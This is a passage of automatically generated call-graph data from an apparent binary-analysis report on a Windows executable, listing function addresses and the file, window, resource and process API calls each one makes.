24669 cd3e3e 22 API calls 24667->24669 24668 cb1767 24677 cb6ca7 75 API calls 24668->24677 24671 cb17ce 24669->24671 24671->24675 24679 cb6ca7 75 API calls 24671->24679 24672->24675 24678 cb6ca7 75 API calls 24672->24678 24675->24651 24676->24668 24677->24665 24678->24675 24679->24675 24680->24653 24681->24654 24683 cbcf4d 24682->24683 24685 cbcf54 24682->24685 24687 cb981a 24683->24687 24685->24530 24686->24532 24688 cb9833 24687->24688 24690 cb9e80 79 API calls 24688->24690 24689 cb9865 24689->24685 24690->24689 24692 ccde78 24691->24692 24693 cbe617 53 API calls 24692->24693 24694 ccde9b 24693->24694 24695 cb4092 _swprintf 51 API calls 24694->24695 24696 ccdead 24695->24696 24697 ccd4d4 16 API calls 24696->24697 24698 cc1b7c 24697->24698 24698->24485 24700 cb19bf 24699->24700 24703 cb19bb 24699->24703 24704 cb9e80 79 API calls 24700->24704 24701 cb19d4 24705 cb18f6 24701->24705 24703->24539 24704->24701 24706 cb1908 24705->24706 24707 cb1945 24705->24707 24708 cb3b2d 101 API calls 24706->24708 24713 cb3fa3 24707->24713 24711 cb1928 24708->24711 24711->24703 24717 cb3fac 24713->24717 24714 cb3b2d 101 API calls 24714->24717 24715 cb1966 24715->24711 24718 cb1e50 24715->24718 24717->24714 24717->24715 24730 cc0e08 24717->24730 24719 cb1e5a __EH_prolog 24718->24719 24738 cb3bba 24719->24738 24721 cb1e84 24722 cb1732 78 API calls 24721->24722 24725 cb1f0b 24721->24725 24723 cb1e9b 24722->24723 24766 cb18a9 78 API calls 24723->24766 24725->24711 24726 cb1eb3 24728 cb1ebf _wcslen 24726->24728 24767 cc1b84 MultiByteToWideChar 24726->24767 24768 cb18a9 78 API calls 24728->24768 24732 cc0e0f 24730->24732 24731 cc0e2a 24734 cc0e3b SetThreadExecutionState 24731->24734 24737 cb6c31 RaiseException CallUnexpected 24731->24737 24732->24731 24736 cb6c31 RaiseException CallUnexpected 24732->24736 24734->24717 24736->24731 24737->24734 24739 cb3bc4 __EH_prolog 24738->24739 24740 cb3bda 24739->24740 24741 cb3bf6 24739->24741 24794 cb138b 74 API calls 24740->24794 24743 cb3e51 24741->24743 24746 cb3c22 24741->24746 24819 cb138b 74 API calls 24743->24819 24745 cb3be5 24745->24721 24746->24745 24769 cc3377 24746->24769 24748 cb3ca3 24750 cb3d2e 24748->24750 24765 cb3c9a 24748->24765 24797 cbd051 24748->24797 24749 cb3c9f 24749->24748 24796 cb20bd 78 API calls 24749->24796 24779 cbab1a 24750->24779 24752 cb3c8f 24795 cb138b 74 API calls 24752->24795 24753 cb3c71 24753->24748 24753->24749 24753->24752 24755 cb3d41 24759 cb3dd7 24755->24759 24760 cb3dc7 24755->24760 24803 cc3020 24759->24803 24783 cb9215 24760->24783 24763 cb3dd5 24763->24765 24812 cb2021 74 API calls 24763->24812 24813 cc2297 24765->24813 24766->24726 24767->24728 24768->24725 24770 cc338c 24769->24770 24772 cc3396 ___std_exception_copy 24769->24772 24820 cb6ca7 75 API calls 24770->24820 24773 cc34c6 24772->24773 24774 cc341c 24772->24774 24778 cc3440 _abort 24772->24778 24822 cd238d RaiseException 24773->24822 24821 cc32aa 75 API calls 3 library calls 24774->24821 24777 cc34f2 24778->24753 24780 cbab28 24779->24780 24782 cbab32 24779->24782 24781 cceb38 8 API calls 24780->24781 24781->24782 24782->24755 24784 cb921f __EH_prolog 24783->24784 24823 cb7c64 24784->24823 24787 cb13ba 78 API calls 24788 cb9231 24787->24788 24826 cbd114 24788->24826 24790 cb928a 24790->24763 24792 cbd114 118 API calls 24793 cb9243 24792->24793 24793->24790 24793->24792 24835 cbd300 97 API calls __InternalCxxFrameHandler 24793->24835 24794->24745 24795->24765 24796->24748 24798 cbd072 24797->24798 24799 cbd084 24797->24799 24836 cb603a 82 API calls 24798->24836 24837 cb603a 82 API calls 24799->24837 24802 cbd07c 24802->24750 24804 cc3029 24803->24804 24805 cc3052 24803->24805 24807 cc3048 24804->24807 24808 cc303e 24804->24808 24811 cc3046 24804->24811 24805->24811 24852 cc552f 123 API calls 2 library calls 24805->24852 24851 cc624a 118 API calls 24807->24851 24838 cc6cdc 24808->24838 24811->24763 24812->24765 24814 cc22a1 24813->24814 24815 cc22ba 24814->24815 24818 cc22ce 24814->24818 24853 cc0eed 86 API calls 24815->24853 24817 cc22c1 24817->24818 24819->24745 24820->24772 24821->24778 24822->24777 24824 cbb146 GetVersionExW 24823->24824 24825 cb7c69 24824->24825 24825->24787 24832 cbd12a __InternalCxxFrameHandler 24826->24832 24827 cbd29a 24828 cbd2ce 24827->24828 24829 cbd0cb 6 API calls 24827->24829 24830 cc0e08 SetThreadExecutionState RaiseException 24828->24830 24829->24828 24833 cbd291 24830->24833 24831 cc8c8d 103 API calls 24831->24832 24832->24827 24832->24831 24832->24833 24834 cbac05 91 API calls 24832->24834 24833->24793 24834->24832 24835->24793 24836->24802 24837->24802 24839 cc359e 75 API calls 24838->24839 24840 cc6ced __InternalCxxFrameHandler 24839->24840 24841 cbd114 118 API calls 24840->24841 24842 cc70fe 24840->24842 24845 cc11cf 81 API calls 24840->24845 24846 cc3e0b 118 API calls 24840->24846 24847 cc7153 118 API calls 24840->24847 24848 cc0f86 88 API calls 24840->24848 24849 cc390d 98 API calls 24840->24849 24850 cc77ef 123 API calls 24840->24850 24841->24840 24843 cc5202 98 API calls 24842->24843 24844 cc710e __InternalCxxFrameHandler 24843->24844 24844->24811 24845->24840 24846->24840 24847->24840 24848->24840 24849->24840 24850->24840 24851->24811 24852->24811 24853->24817 24854->24549 24855->24549 24856->24546 24858 cb5d2a 24857->24858 24903 cb5c4b 24858->24903 24861 cb5d5d 24862 cb5d95 24861->24862 24908 cbb1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 24861->24908 24862->24563 24865 cb8186 24863->24865 24864 cb8232 24914 cc1fac CharUpperW 24864->24914 24865->24864 24915 cbbe5e 19 API calls __InternalCxxFrameHandler 24865->24915 24868 cb823b 24868->24566 24871 cb7c22 24869->24871 24870 cb7c5a 24870->24577 24871->24870 24916 cb6e7a 74 API calls 24871->24916 24873 cb7c52 24917 cb138b 74 API calls 24873->24917 24875->24629 24877 cb9db3 24876->24877 24880 cb9dc2 24876->24880 24878 cb9db9 FlushFileBuffers 24877->24878 24877->24880 24878->24880 24879 cb9e3f SetFileTime 24879->24635 24880->24879 24881->24554 24882->24567 24883->24567 24884->24577 24885->24577 24886->24574 24887->24586 24888->24582 24889->24586 24891 cb98c5 GetFileType 24890->24891 24892 cb8b5a 24890->24892 24891->24892 24892->24600 24893 cb2021 74 API calls 24892->24893 24893->24598 24894->24600 24895->24601 24896->24626 24897->24626 24898->24626 24899->24626 24900->24632 24901->24638 24902->24580 24909 cb5b48 24903->24909 24905 cb5c6c 24905->24861 24907 cb5b48 2 API calls 24907->24905 24908->24861 24911 cb5b52 24909->24911 24910 cb5c3a 24910->24905 24910->24907 24911->24910 24913 cbb1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 24911->24913 24913->24911 24914->24868 24915->24864 24916->24873 24917->24870 24919->24646 24921 cba6a8 24920->24921 24922 cba6c1 FindFirstFileW 24921->24922 24923 cba727 FindNextFileW 24921->24923 24925 cba6d0 24922->24925 24930 cba709 24922->24930 24924 cba732 GetLastError 24923->24924 24923->24930 24924->24930 24926 cbbb03 GetCurrentDirectoryW 24925->24926 24927 cba6e0 24926->24927 24928 cba6fe GetLastError 24927->24928 24929 cba6e4 FindFirstFileW 24927->24929 24928->24930 24929->24928 24929->24930 24930->24498 24940 cca5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24931->24940 24933 cca5cd 24934 cca5d9 24933->24934 24941 cca605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24933->24941 24934->24296 24934->24297 24936->24300 24937->24306 24938->24306 24939->24309 24940->24933 24941->24934 24942->24317 24944 cb9f42 78 API calls 24943->24944 24945 cb1fe8 24944->24945 24946 cb1a04 101 API calls 24945->24946 24949 cb2005 24945->24949 24947 cb1ff5 24946->24947 24947->24949 24950 cb138b 74 API calls 24947->24950 24949->24325 24949->24326 24950->24949 25489 cc94e0 GetClientRect 25542 cc21e0 26 API calls std::bad_exception::bad_exception 25490 cdbee0 GetCommandLineA GetCommandLineW 25491 cd2cfb 38 API calls 4 library calls 25492 cb5ef0 82 API calls 25543 cb95f0 80 API calls 24966 cd98f0 24974 cdadaf 24966->24974 24968 cd9904 24971 cd990c 24972 cd9919 24971->24972 24982 cd9920 11 API calls 24971->24982 24975 cdac98 __dosmaperr 5 API calls 24974->24975 24976 cdadd6 24975->24976 24977 cdaddf 24976->24977 24978 cdadee TlsAlloc 24976->24978 24979 ccfbbc CatchGuardHandler 5 API calls 24977->24979 24978->24977 24980 cd98fa 24979->24980 24980->24968 24981 cd9869 20 API calls 2 library calls 24980->24981 24981->24971 24982->24968 24983 cdabf0 24984 cdabfb 24983->24984 24986 cdac24 24984->24986 24987 cdac20 24984->24987 24989 cdaf0a 24984->24989 24996 cdac50 DeleteCriticalSection 24986->24996 24990 cdac98 __dosmaperr 5 API calls 24989->24990 24991 cdaf31 24990->24991 24992 cdaf4f InitializeCriticalSectionAndSpinCount 24991->24992 24995 cdaf3a 24991->24995 24992->24995 24993 ccfbbc CatchGuardHandler 5 API calls 24994 cdaf66 24993->24994 24994->24984 24995->24993 24996->24987 25493 cd88f0 7 API calls ___scrt_uninitialize_crt 25545 ccfd4f 9 API calls 2 library calls 25546 ccb18d 78 API calls 25495 ccc793 97 API calls 4 library calls 25497 ccc793 102 API calls 4 library calls 25549 cc9580 6 API calls 25551 cb6faa 111 API calls 3 library calls 25553 cceda7 48 API calls _unexpected 25554 ccf3a0 27 API calls 25501 cda4a0 71 API calls _free 25502 ccdca1 DialogBoxParamW 25503 cda6a0 31 API calls 2 library calls 25504 ce08a0 IsProcessorFeaturePresent 25555 cc1bbd GetCPInfo IsDBCSLeadByte 25556 cdb1b8 27 API calls 2 library calls 25557 ccb1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 25034 ccf3b2 25035 ccf3be ___scrt_is_nonwritable_in_current_image 25034->25035 25066 cceed7 25035->25066 25037 ccf3c5 25038 ccf518 25037->25038 25041 ccf3ef 25037->25041 25139 ccf838 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 25038->25139 25040 ccf51f 25132 cd7f58 25040->25132 25053 ccf42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 25041->25053 25077 cd8aed 25041->25077 25048 ccf40e 25050 ccf48f 25085 ccf953 GetStartupInfoW _abort 25050->25085 25052 ccf495 25086 cd8a3e 51 API calls 25052->25086 25053->25050 25135 cd7af4 38 API calls 3 library calls 25053->25135 25055 ccf49d 25087 ccdf1e 25055->25087 25060 ccf4b1 25060->25040 25061 ccf4b5 25060->25061 25062 ccf4be 25061->25062 25137 cd7efb 28 API calls _abort 25061->25137 25138 ccf048 12 API calls ___scrt_uninitialize_crt 25062->25138 25065 ccf4c6 25065->25048 25067 cceee0 25066->25067 25141 ccf654 IsProcessorFeaturePresent 25067->25141 25069 cceeec 25142 cd2a5e 25069->25142 25071 cceef1 25072 cceef5 25071->25072 25150 cd8977 25071->25150 25072->25037 25075 ccef0c 25075->25037 25079 cd8b04 25077->25079 25078 ccfbbc CatchGuardHandler 5 API calls 25080 ccf408 25078->25080 25079->25078 25080->25048 25081 cd8a91 25080->25081 25082 cd8ac0 25081->25082 25083 ccfbbc CatchGuardHandler 5 API calls 25082->25083 25084 cd8ae9 25083->25084 25084->25053 25085->25052 25086->25055 25201 cc0863 25087->25201 25091 ccdf3d 25250 ccac16 25091->25250 25093 ccdf46 _abort 25094 ccdf59 GetCommandLineW 25093->25094 25095 ccdf68 25094->25095 25096 ccdfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 25094->25096 25254 ccc5c4 25095->25254 25097 cb4092 _swprintf 51 API calls 25096->25097 25099 cce04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 25097->25099 25265 ccb6dd LoadBitmapW 25099->25265 25102 ccdf76 OpenFileMappingW 25106 ccdf8f MapViewOfFile 25102->25106 25107 ccdfd6 CloseHandle 25102->25107 25103 ccdfe0 25259 ccdbde 25103->25259 25109 ccdfcd UnmapViewOfFile 25106->25109 25110 ccdfa0 __InternalCxxFrameHandler 25106->25110 25107->25096 25109->25107 25114 ccdbde 2 API calls 25110->25114 25116 ccdfbc 25114->25116 25115 cc90b7 8 API calls 25117 cce0aa DialogBoxParamW 25115->25117 25116->25109 25118 cce0e4 25117->25118 25119 cce0fd 25118->25119 25120 cce0f6 Sleep 25118->25120 25122 cce10b 25119->25122 25295 ccae2f CompareStringW SetCurrentDirectoryW _abort _wcslen 25119->25295 25120->25119 25123 cce12a DeleteObject 25122->25123 25124 cce13f DeleteObject 25123->25124 25125 cce146 25123->25125 25124->25125 25126 cce189 25125->25126 25127 cce177 25125->25127 25292 ccac7c 25126->25292 25296 ccdc3b 6 API calls 25127->25296 25129 cce17d CloseHandle 25129->25126 25131 cce1c3 25136 ccf993 GetModuleHandleW 25131->25136 25428 cd7cd5 25132->25428 25135->25050 25136->25060 25137->25062 25138->25065 25139->25040 25141->25069 25154 cd3b07 25142->25154 25145 cd2a67 25145->25071 25147 cd2a6f 25148 cd2a7a 25147->25148 25168 cd3b43 DeleteCriticalSection 25147->25168 25148->25071 25197 cdc05a 25150->25197 25153 cd2a7d 7 API calls 2 library calls 25153->25072 25156 cd3b10 25154->25156 25157 cd3b39 25156->25157 25158 cd2a63 25156->25158 25169 cd3d46 25156->25169 25174 cd3b43 DeleteCriticalSection 25157->25174 25158->25145 25160 cd2b8c 25158->25160 25190 cd3c57 25160->25190 25164 cd2baf 25165 cd2bbc 25164->25165 25196 cd2bbf 6 API calls ___vcrt_FlsFree 25164->25196 25165->25147 25167 cd2ba1 25167->25147 25168->25145 25175 cd3c0d 25169->25175 25172 cd3d7e InitializeCriticalSectionAndSpinCount 25173 cd3d69 25172->25173 25173->25156 25174->25158 25176 cd3c4f 25175->25176 25177 cd3c26 25175->25177 25176->25172 25176->25173 25177->25176 25182 cd3b72 25177->25182 25180 cd3c3b GetProcAddress 25180->25176 25181 cd3c49 25180->25181 25181->25176 25183 cd3b7e ___vcrt_FlsSetValue 25182->25183 25184 cd3b95 LoadLibraryExW 25183->25184 25185 cd3bf3 25183->25185 25189 cd3bd5 LoadLibraryExW 25183->25189 25186 cd3bfa 25184->25186 25187 cd3bb3 GetLastError 25184->25187 25185->25176 25185->25180 25186->25185 25188 cd3c02 FreeLibrary 25186->25188 25187->25183 25188->25185 25189->25183 25189->25186 25191 cd3c0d ___vcrt_FlsSetValue 5 API calls 25190->25191 25192 cd3c71 25191->25192 25193 cd3c8a TlsAlloc 25192->25193 25194 cd2b96 25192->25194 25194->25167 25195 cd3d08 6 API calls ___vcrt_FlsSetValue 25194->25195 25195->25164 25196->25167 25198 cdc073 25197->25198 25199 ccfbbc CatchGuardHandler 5 API calls 25198->25199 25200 cceefe 25199->25200 25200->25075 25200->25153 25202 ccec50 25201->25202 25203 cc086d GetModuleHandleW 25202->25203 25204 cc0888 GetProcAddress 25203->25204 25205 cc08e7 25203->25205 25206 cc08b9 GetProcAddress 25204->25206 25207 cc08a1 25204->25207 25208 cc0c14 GetModuleFileNameW 25205->25208 25306 cd75fb 42 API calls 2 library calls 25205->25306 25210 cc08cb 25206->25210 25207->25206 25217 cc0c32 25208->25217 25210->25205 25211 cc0b54 25211->25208 25212 cc0b5f GetModuleFileNameW CreateFileW 25211->25212 25213 cc0b8f SetFilePointer 25212->25213 25214 cc0c08 CloseHandle 25212->25214 25213->25214 25215 cc0b9d ReadFile 25213->25215 25214->25208 25215->25214 25219 cc0bbb 25215->25219 25220 cc0c94 GetFileAttributesW 25217->25220 25222 cc0c5d CompareStringW 25217->25222 25223 cc0cac 25217->25223 25297 cbb146 25217->25297 25300 cc081b 25217->25300 25219->25214 25221 cc081b 2 API calls 25219->25221 25220->25217 25220->25223 25221->25219 25222->25217 25224 cc0cb7 25223->25224 25227 cc0cec 25223->25227 25226 cc0cd0 GetFileAttributesW 25224->25226 25228 cc0ce8 25224->25228 25225 cc0dfb 25249 cca64d GetCurrentDirectoryW 25225->25249 25226->25224 25226->25228 25227->25225 25229 cbb146 GetVersionExW 25227->25229 25228->25227 25230 cc0d06 25229->25230 25231 cc0d0d 25230->25231 25232 cc0d73 25230->25232 25234 cc081b 2 API calls 25231->25234 25233 cb4092 _swprintf 51 API calls 25232->25233 25235 cc0d9b AllocConsole 25233->25235 25236 cc0d17 25234->25236 25238 cc0da8 GetCurrentProcessId AttachConsole 25235->25238 25239 cc0df3 ExitProcess 25235->25239 25237 cc081b 2 API calls 25236->25237 25240 cc0d21 25237->25240 25307 cd3e13 25238->25307 25242 cbe617 53 API calls 25240->25242 25244 cc0d3c 25242->25244 25243 cc0dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 25243->25239 25245 cb4092 _swprintf 51 API calls 25244->25245 25246 cc0d4f 25245->25246 25247 cbe617 53 API calls 25246->25247 25248 cc0d5e 25247->25248 25248->25239 25249->25091 25251 cc081b 2 API calls 25250->25251 25252 ccac2a OleInitialize 25251->25252 25253 ccac4d GdiplusStartup SHGetMalloc 25252->25253 25253->25093 25255 ccc5ce 25254->25255 25256 ccc6e4 25255->25256 25257 cc1fac CharUpperW 25255->25257 25309 cbf3fa 82 API calls 2 library calls 25255->25309 25256->25102 25256->25103 25257->25255 25260 ccec50 25259->25260 25261 ccdbeb SetEnvironmentVariableW 25260->25261 25263 ccdc0e 25261->25263 25262 ccdc36 25262->25096 25263->25262 25264 ccdc2a SetEnvironmentVariableW 25263->25264 25264->25262 25266 ccb6fe 25265->25266 25267 ccb70b GetObjectW 25265->25267 25310 cca6c2 FindResourceW 25266->25310 25269 ccb71a 25267->25269 25271 cca5c6 4 API calls 25269->25271 25272 ccb72d 25271->25272 25273 ccb770 25272->25273 25274 ccb74c 25272->25274 25276 cca6c2 13 API calls 25272->25276 25284 cbda42 25273->25284 25326 cca605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25274->25326 25277 ccb73d 25276->25277 25277->25274 25279 ccb743 DeleteObject 25277->25279 25278 ccb754 25327 cca5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25278->25327 25279->25274 25281 ccb75d 25328 cca80c 8 API calls 25281->25328 25283 ccb764 DeleteObject 25283->25273 25337 cbda67 25284->25337 25289 cc90b7 25290 cceb38 8 API calls 25289->25290 25291 cc90d6 25290->25291 25291->25115 25293 ccacab GdiplusShutdown CoUninitialize 25292->25293 25293->25131 25295->25122 25296->25129 25298 cbb15a GetVersionExW 25297->25298 25299 cbb196 25297->25299 25298->25299 25299->25217 25301 ccec50 25300->25301 25302 cc0828 GetSystemDirectoryW 25301->25302 25303 cc085e 25302->25303 25304 cc0840 25302->25304 25303->25217 25305 cc0851 LoadLibraryW 25304->25305 25305->25303 25306->25211 25308 cd3e1b 25307->25308 25308->25243 25308->25308 25309->25255 25311 cca7d3 25310->25311 25312 cca6e5 SizeofResource 25310->25312 25311->25267 25311->25269 25312->25311 25313 cca6fc LoadResource 25312->25313 25313->25311 25314 cca711 LockResource 25313->25314 25314->25311 25315 cca722 GlobalAlloc 25314->25315 25315->25311 25316 cca73d GlobalLock 25315->25316 25317 cca7cc GlobalFree 25316->25317 25318 cca74c __InternalCxxFrameHandler 25316->25318 25317->25311 25319 cca754 CreateStreamOnHGlobal 25318->25319 25320 cca76c 25319->25320 25321 cca7c5 GlobalUnlock 25319->25321 25329 cca626 GdipAlloc 25320->25329 25321->25317 25324 cca79a GdipCreateHBITMAPFromBitmap 25325 cca7b0 25324->25325 25325->25321 25326->25278 25327->25281 25328->25283 25330 cca638 25329->25330 25331 cca645 25329->25331 25333 cca3b9 25330->25333 25331->25321 25331->25324 25331->25325 25334 cca3da GdipCreateBitmapFromStreamICM 25333->25334 25335 cca3e1 GdipCreateBitmapFromStream 25333->25335 25336 cca3e6 25334->25336 25335->25336 25336->25331 25338 cbda75 __EH_prolog 25337->25338 25339 cbdaa4 GetModuleFileNameW 25338->25339 25340 cbdad5 25338->25340 25341 cbdabe 25339->25341 25383 cb98e0 25340->25383 25341->25340 25343 cbdb31 25394 cd6310 25343->25394 25344 cb959a 80 API calls 25345 cbda4e 25344->25345 25381 cbe29e GetModuleHandleW FindResourceW 25345->25381 25347 cbdb05 25347->25343 25349 cbe261 78 API calls 25347->25349 25361 cbdd4a 25347->25361 25348 cbdb44 25350 cd6310 26 API calls 25348->25350 25349->25347 25358 cbdb56 ___vcrt_FlsSetValue 25350->25358 25351 cbdc85 25351->25361 25414 cb9d70 81 API calls 25351->25414 25353 cb9e80 79 API calls 25353->25358 25355 cbdc9f ___std_exception_copy 25356 cb9bd0 82 API calls 25355->25356 25355->25361 25359 cbdcc8 ___std_exception_copy 25356->25359 25358->25351 25358->25353 25358->25361 25408 cb9bd0 25358->25408 25413 cb9d70 81 API calls 25358->25413 25359->25361 25379 cbdcd3 ___vcrt_FlsSetValue _wcslen ___std_exception_copy 25359->25379 25415 cc1b84 MultiByteToWideChar 25359->25415 25361->25344 25362 cbe159 25367 cbe1de 25362->25367 25421 cd8cce 26 API calls 2 library calls 25362->25421 25364 cbe16e 25422 cd7625 26 API calls 2 library calls 25364->25422 25366 cbe1c6 25423 cbe27c 78 API calls 25366->25423 25368 cbe214 25367->25368 25371 cbe261 78 API calls 25367->25371 25372 cd6310 26 API calls 25368->25372 25371->25367 25373 cbe22d 25372->25373 25374 cd6310 26 API calls 25373->25374 25374->25361 25376 cc1da7 WideCharToMultiByte 25376->25379 25379->25361 25379->25362 25379->25376 25416 cbe5b1 50 API calls __vsnprintf 25379->25416 25417 cd6159 26 API calls 3 library calls 25379->25417 25418 cd8cce 26 API calls 2 library calls 25379->25418 25419 cd7625 26 API calls 2 library calls 25379->25419 25420 cbe27c 78 API calls 25379->25420 25382 cbda55 25381->25382 25382->25289 25384 cb98ea 25383->25384 25385 cb994b CreateFileW 25384->25385 25386 cb996c GetLastError 25385->25386 25389 cb99bb 25385->25389 25387 cbbb03 GetCurrentDirectoryW 25386->25387 25388 cb998c 25387->25388 25388->25389 25390 cb9990 CreateFileW GetLastError 25388->25390 25391 cb99ff 25389->25391 25393 cb99e5 SetFileTime 25389->25393 25390->25389 25392 cb99b5 25390->25392 25391->25347 25392->25389 25393->25391 25395 cd6349 25394->25395 25396 cd634d 25395->25396 25407 cd6375 25395->25407 25424 cd91a8 20 API calls __dosmaperr 25396->25424 25398 cd6699 25400 ccfbbc CatchGuardHandler 5 API calls 25398->25400 25399 cd6352 25425 cd9087 26 API calls __cftof 25399->25425 25402 cd66a6 25400->25402 25402->25348 25403 cd635d 25404 ccfbbc CatchGuardHandler 5 API calls 25403->25404 25405 cd6369 25404->25405 25405->25348 25407->25398 25426 cd6230 5 API calls CatchGuardHandler 25407->25426 25409 cb9bdc 25408->25409 25411 cb9be3 25408->25411 25409->25358 25411->25409 25412 cb9785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25411->25412 25427 cb6d1a 77 API calls 25411->25427 25412->25411 25413->25358 25414->25355 25415->25379 25416->25379 25417->25379 25418->25379 25419->25379 25420->25379 25421->25364 25422->25366 25423->25367 25424->25399 25425->25403 25426->25407 25427->25411 25429 cd7ce1 _unexpected 25428->25429 25430 cd7ce8 25429->25430 25431 cd7cfa 25429->25431 25464 cd7e2f GetModuleHandleW 25430->25464 25452 cdac31 EnterCriticalSection 25431->25452 25434 cd7ced 25434->25431 25465 cd7e73 GetModuleHandleExW 25434->25465 25435 cd7d9f 25453 cd7ddf 25435->25453 25439 cd7d76 25443 cd7d8e 25439->25443 25447 cd8a91 _abort 5 API calls 25439->25447 25441 cd7dbc 25456 cd7dee 25441->25456 25442 cd7de8 25474 ce2390 5 API calls CatchGuardHandler 25442->25474 25448 cd8a91 _abort 5 API calls 25443->25448 25447->25443 25448->25435 25449 cd7d01 25449->25435 25449->25439 25473 cd87e0 20 API calls _abort 25449->25473 25452->25449 25475 cdac81 LeaveCriticalSection 25453->25475 25455 cd7db8 25455->25441 25455->25442 25476 cdb076 25456->25476 25459 cd7e1c 25462 cd7e73 _abort 8 API calls 25459->25462 25460 cd7dfc GetPEB 25460->25459 25461 cd7e0c GetCurrentProcess TerminateProcess 25460->25461 25461->25459 25463 cd7e24 ExitProcess 25462->25463 25464->25434 25466 cd7e9d GetProcAddress 25465->25466 25467 cd7ec0 25465->25467 25468 cd7eb2 25466->25468 25469 cd7ecf 25467->25469 25470 cd7ec6 FreeLibrary 25467->25470 25468->25467 25471 ccfbbc CatchGuardHandler 5 API calls 25469->25471 25470->25469 25472 cd7cf9 25471->25472 25472->25431 25473->25439 25475->25455 25477 cdb09b 25476->25477 25478 cdb091 25476->25478 25479 cdac98 __dosmaperr 5 API calls 25477->25479 25480 ccfbbc CatchGuardHandler 5 API calls 25478->25480 25479->25478 25481 cd7df8 25480->25481 25481->25459 25481->25460 23497 cce44b 23498 cce3f4 23497->23498 23500 cce85d 23498->23500 23526 cce5bb 23500->23526 23502 cce86d 23503 cce8ee 23502->23503 23504 cce8ca 23502->23504 23507 cce966 LoadLibraryExA 23503->23507 23509 cce9c7 23503->23509 23512 cce9d9 23503->23512 23515 ccea95 23503->23515 23505 cce7fb DloadReleaseSectionWriteAccess 6 API calls 23504->23505 23506 cce8d5 RaiseException 23505->23506 23521 cceac3 23506->23521 23508 cce979 GetLastError 23507->23508 23507->23509 23510 cce9a2 23508->23510 23519 cce98c 23508->23519 23509->23512 23513 cce9d2 FreeLibrary 23509->23513 23514 cce7fb DloadReleaseSectionWriteAccess 6 API calls 23510->23514 23511 ccea37 GetProcAddress 23511->23515 23516 ccea47 GetLastError 23511->23516 23512->23511 23512->23515 23513->23512 23520 cce9ad RaiseException 23514->23520 23535 cce7fb 23515->23535 23517 ccea5a 23516->23517 23517->23515 23522 cce7fb DloadReleaseSectionWriteAccess 6 API calls 23517->23522 23519->23509 23519->23510 23520->23521 23521->23498 23523 ccea7b RaiseException 23522->23523 23524 cce5bb ___delayLoadHelper2@8 6 API calls 23523->23524 23525 ccea92 23524->23525 23525->23515 23527 cce5ed 23526->23527 23528 cce5c7 23526->23528 23527->23502 23543 cce664 23528->23543 23530 cce5cc 23531 cce5e8 23530->23531 23546 cce78d 23530->23546 23551 cce5ee GetModuleHandleW GetProcAddress GetProcAddress 23531->23551 23534 cce836 23534->23502 23536 cce80d 23535->23536 23537 cce82f 23535->23537 23538 cce664 DloadReleaseSectionWriteAccess 3 API calls 23536->23538 23537->23521 23539 cce812 23538->23539 23540 cce82a 23539->23540 23541 cce78d DloadProtectSection 3 API calls 23539->23541 23554 cce831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23540->23554 23541->23540 23552 cce5ee GetModuleHandleW GetProcAddress GetProcAddress 23543->23552 23545 cce669 23545->23530 23548 cce7a2 DloadProtectSection 23546->23548 23547 cce7a8 23547->23531 23548->23547 23549 cce7dd VirtualProtect 23548->23549 23553 cce6a3 VirtualQuery GetSystemInfo 23548->23553 23549->23547 23551->23534 23552->23545 23553->23549 23554->23537 25506 cca440 GdipCloneImage GdipAlloc 25507 cd3a40 5 API calls CatchGuardHandler 25561 ce1f40 CloseHandle 23685 cccd58 23687 ccce22 23685->23687 23692 cccd7b 23685->23692 23698 ccc793 _wcslen _wcsrchr 23687->23698 23713 ccd78f 23687->23713 23689 ccd40a 23690 cc1fbb CompareStringW 23690->23692 23692->23687 23692->23690 23693 ccca67 SetWindowTextW 23693->23698 23698->23689 23698->23693 23699 ccc855 SetFileAttributesW 23698->23699 23704 cccc31 GetDlgItem SetWindowTextW SendMessageW 23698->23704 23707 cccc71 SendMessageW 23698->23707 23712 cc1fbb CompareStringW 23698->23712 23737 ccb314 23698->23737 23741 cca64d GetCurrentDirectoryW 23698->23741 23743 cba5d1 6 API calls 23698->23743 23744 cba55a FindClose 23698->23744 23745 ccb48e 76 API calls 2 library calls 23698->23745 23746 cd3e3e 23698->23746 23701 ccc90f GetFileAttributesW 23699->23701 23711 ccc86f _abort _wcslen 23699->23711 23701->23698 23703 ccc921 DeleteFileW 23701->23703 23703->23698 23705 ccc932 23703->23705 23704->23698 23706 cb4092 _swprintf 51 API calls 23705->23706 23708 ccc952 GetFileAttributesW 23706->23708 23707->23698 23708->23705 23709 ccc967 MoveFileW 23708->23709 23709->23698 23710 ccc97f MoveFileExW 23709->23710 23710->23698 23711->23698 23711->23701 23742 cbb991 51 API calls 2 library calls 23711->23742 23712->23698 23715 ccd799 _abort _wcslen 23713->23715 23714 ccd9e7 23714->23698 23715->23714 23716 ccd9c0 23715->23716 23717 ccd8a5 23715->23717 23762 cc1fbb CompareStringW 23715->23762 23716->23714 23720 ccd9de ShowWindow 23716->23720 23759 cba231 23717->23759 23720->23714 23722 ccd8d9 ShellExecuteExW 23722->23714 23728 ccd8ec 23722->23728 23724 ccd8d1 23724->23722 23725 ccd925 23764 ccdc3b 6 API calls 23725->23764 23726 ccd97b CloseHandle 23727 ccd989 23726->23727 23732 ccd994 23726->23732 23765 cc1fbb CompareStringW 23727->23765 23728->23725 23728->23726 23730 ccd91b ShowWindow 23728->23730 23730->23725 23732->23716 23733 ccd93d 23733->23726 23734 ccd950 GetExitCodeProcess 23733->23734 23734->23726 23735 ccd963 23734->23735 23735->23726 23738 ccb31e 23737->23738 23739 ccb3f0 ExpandEnvironmentStringsW 23738->23739 23740 ccb40d 23738->23740 23739->23740 23740->23698 23741->23698 23742->23711 23743->23698 23744->23698 23745->23698 23747 cd8e54 23746->23747 23748 cd8e6c 23747->23748 23749 